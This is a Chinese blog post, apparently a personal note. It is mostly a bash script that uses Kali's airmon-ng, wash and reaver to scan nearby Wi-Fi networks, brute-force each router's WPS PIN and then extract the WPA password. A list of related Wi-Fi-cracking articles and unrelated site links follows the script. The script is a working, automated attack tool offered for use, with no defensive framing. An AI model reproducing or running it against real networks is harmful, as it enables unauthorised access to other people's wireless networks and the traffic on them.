直接上脚本吧, 我做个笔记。

#*************************************************************************
# > File Name: wifi.sh
# > Author: chenglee
# > Main : chengkenlee@sina.com
# > Blog : http://www.cnblogs.com/chenglee/
# > Created Time : Tue 26 Mar 2019 09:30:16 PM CST
#*************************************************************************
#!/bin/bash wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'` function Wwash(){
echo "判断网卡是否以挂载..."
if [ -z "${wlanname}" ];then
echo "网卡没挂载, 请先手动挂载网卡"
exit;
else
echo "网卡已挂载,判断是否已启动监听模式"
#airmon-ng start ${wlanname}
wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
string="mon"
if [[ $wlanname =~ $string ]];then
echo "监听模式正常, 开始扫描附近无线网络..."
nohup wash -i ${wlanname} > logs/file 2>&1 &
else
echo "监听模式异常, 准备重启监听模式"
airmon-ng stop ${wlanname}
airmon-ng start ${wlanname}
echo "检查网卡监听模式状态"
if [[ $wlanname =~ $string ]];then
echo "监听模式正常, 开始扫描附近无线网络..."
nohup wash -i ${wlanname} > logs/file 2>&1 &
else
echo "定点异常,请插拔网卡后继续运行此脚本"
exit;
fi
fi
fi
}
function file(){
sleep 5;
num=`cat -n logs/file | grep BSSID | awk -F ' ' '{print$1}'`
number=`expr ${num} + 2`
nullnum=`sed -n ''"$number"',$p' logs/file | awk '/^$/{print NR}' | head -n 1`
if [ "$nullnum" = "" ];then
sed -n ''"$number"',$p' logs/file | awk -F ' ' '{print$1,$2}' > logs/file1
cat logs/file1 | awk -F ' ' '{print$1}' > logs/mac
cat logs/file1 | awk -F ' ' '{print$2}' > logs/ch
else
sed -n ''"$number"',$p' logs/file | awk -F ' ' '{print$1,$2}' > logs/file1
nullnu=`expr ${nullnum} - 1`
sed -n '1,'"$nullnu"'p' logs/file1 > logs/file2
cat logs/file2 | awk -F ' ' '{print$1}' > logs/mac
cat logs/file2 | awk -F ' ' '{print$2}' > logs/ch
fi
}
function Rreaver(){
wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
exec 3<"logs/mac"
exec 4<"logs/ch"
while read line1<&3 && read line2<&4
do
echo "后台分析物理地址为:${line1},信道为:${line2}的无线网络数据, 请稍后..."
nohup reaver -i ${wlanname} -b ${line1} -c ${line2} -vv -K 0 >> logs/${line1}.logs 2>&1 &
done
}
function analyse_PIN(){
lsatstring="logs"
exec 5<"logs/mac"
while read line3<&5
do
WPA_PIN=`cat logs/${line3}.${lsatstring} | grep WPA`
if [ "$WPA_PIN" = "" ];then
echo "${line3}-PIN码获取不到, 继续判断..."
else
echo "${line3}-PIN码获取成功!!PIN码:${WPA_PIN}"
echo "${line3}" >> logs/pin_mac 2>&1 &
echo "${WPA_PIN}" | awk -F ':' '{print$NF}' | sed 's/ //g' >> logs/pin_pin 2>&1 &
fi
done
}
function Ppin(){
wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
exec 6<"logs/pin_mac"
exec 7<"logs/pin_pin"
while read line4<&6 && read line5<&7
do
echo "开始通过(路由器):${line4},pin码:${line5},套取密码..."
nohup reaver -i ${wlanname} -b ${line4} -p ${line5} >> logs/${line5}.logs 2>&1 &
done
}
function pass(){
lsatstring="logs"
exec 8<"logs/pin_pin"
while read line6<&8
do
PassWord=`cat logs/${line6}.${lsatstring} | grep PSK`
if [ "$PassWord" = "" ];then
echo "PIN码为:${line6},密码获取失败, 继续获取..."
else
echo "PIN码为:${line6},密码获取成功,请前行 logs/${line6}.${lsatstring}文件查看相关 SSID,PASS等信息"
fi
done
}
function logs(){
if [ -d "logs" ];then
echo ""
Wwash
sleep 10;
file
else
echo ""
mkdir logs
Wwash
sleep 10;
file
fi
}
function main(){
#logs
#file
###############多重循环暴力区###############
#Rreaver
#analyse_PIN
#Ppin
#pass
###############多重循环暴力区###############
}
main

  

kali-通过获取路由器pin码套取无线网络密码shell脚本的更多相关文章

  1. 跑PIN码破解无线网络WIFI密码的原理分析(转)

    你们家用的无线路由器安全吗?有人蹭网吗?无线路由器的漏洞在哪里?这么避免蹭网? 想要了解这些,必须要了解加密以及破解原理. 工具/原料 电脑 足够多足够好的wifi信号源 usb无线网卡(非必需) 一 ...

  2. Final——无线网络密码破解——WPA/WPA2

    Final--无线网络密码破解--WPA/WPA2 20154305 齐帅 ↓ ↓ ↓ * # % & 郑 重 声 明 & % # * ↓ ↓ ↓ 本实验教程用于探索无线路由安全漏洞, ...

  3. 破解无线网络密码-BT3如何使用2

    本教程只作学习和交流使用,任何其它商用与本人无关, 在开始教程之前, 首先需要用到几个软件,感兴趣的朋友看完贴子后可以去百度搜一下下载地址, 虚拟机: VMware Workstation 6.5 正 ...

  4. kali拿取路由器pin码

    前序:拿pin码就可以直接跑出WPA PSK, 下面开始记录我的操作过程. 网卡监控模式 airmon-ng start wlan0 扫描 wash -i wlan0mon 破pin 网卡 物理地址 ...

  5. kali 系列学习12-使用Wifite破解无线网络

    一些破解无线网络程序是使用Aircrack-ng工具集,并添加了一个图形界面或使用文本菜单的形式来破解无线网络.这使得用户使用它们更容易,而且不需要记住任何命令.本节将介绍使用命令行工具Wifite, ...

  6. 使用Reaver加PIN码秒破WPA-PSK密码

    之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式,而能否破解出wpa密码完全依赖于字典强度了.除了该方式外还有一个更有效的办法,就是使用路由P ...

  7. 破解无线网络密码-BT3如何使用3

    BT3 虚拟机 SNOOPWEP2 破解无线网络WEP密钥图解 1.下载BT3 光盘映像文件(ISO格式),比如:bt3-final.iso: 用WinISO 或 UltraISO(这个还支持DVD ...

  8. WPA-PSK无线网络密码破解原理

    1.基于WPA2的加密标准还是能够被破解,一个弊端是他无法避开时候双方验证的模式来认证取得合法性的连接,当我们抓取足够多得双反认证的数据包之后就可以破解密码.之前很多片的博客写了如何破解这种加密的秘钥 ...

  9. 【Android M】获取屏幕锁定的相关信息:“无”,“滑动”,“PIN码”,"图案","密码"

    ENV: Android M 6.0.1 import android.os.UserHandle;         import com.android.internal.widget.LockPa ...

随机推荐

  1. 自学stm32的一些个人经验

    1.首先我们先看看与STM32相关的文档 我们假定大家已经对STM32的书籍或者文档有一定的理解.如不理解,请立即阅读STM32的文档,以获取最基本的知识点. 如果你手上拥有ST官方主推的STM32神 ...

  2. JS判断字符串长度的5个方法(区分中文和英文)

    目的:计算字符串长度(英文占1个字符,中文汉字占2个字符) 方法一: 代码如下: String.prototype.gblen = function() {    var len = 0;    fo ...

  3. std unorder_map insert 和 emplace的区别

    std::unordered_map<int, int > map; map.insert(std::make_pair(, )); map.insert(std::make_pair(, ...

  4. k8s-No.3-pod进阶

    本章目录 pod环境变量env pod的资源限制resources pod的健康检查-探针 pod的imagepullsecrets 一   pod-env 环境变量就是系统或者程序运行时的预定义的参 ...

  5. Xcode 断点无用,也不打印输出

    原来是在main.m里使用了ptrace进行反调试. ptrace是系统用来对运行中的进程进行调试和跟踪的工具,通过ptrace,可以对另一个进程实现调试跟踪.但是里面提供了一个非常有用的参数,就是P ...

  6. 多线程深入:乐观锁与悲观锁以及乐观锁的一种实现方式-CAS(转)

    原文:https://www.cnblogs.com/qjjazry/p/6581568.html 首先介绍一些乐观锁与悲观锁: 悲观锁:总是假设最坏的情况,每次去拿数据的时候都认为别人会修改,所以每 ...

  7. ui component 是一个前端 mvc 开发框架

  8. Linux rh7环境下安装Oracle数据库

    1.修改Linux系统的参数 1)检查系统的版本 # more /etc/redhat-release 2)关闭SELinux,需要restart # sed -i 's/SELINUX=enforc ...

  9. virtual dom 简单了解

    管理应用程序状态和用户界面的同步一直是前端UI开发复杂性的主要来源.目前出现了不同的方式来处理这个问题.本文简单讨论其中一种方式virtual dom. 文章概要: virtual dom 基本概念, ...

  10. python可以提高程序执行速度N倍你知道吗?

    1.1.Numba的约5分钟指南 Numba是Python的即时编译器,它最适用于使用NumPy数组和函数以及循环的代码.使用Numba的最常用方法是通过其装饰器集合,可以应用于您的函数来指示Numb ...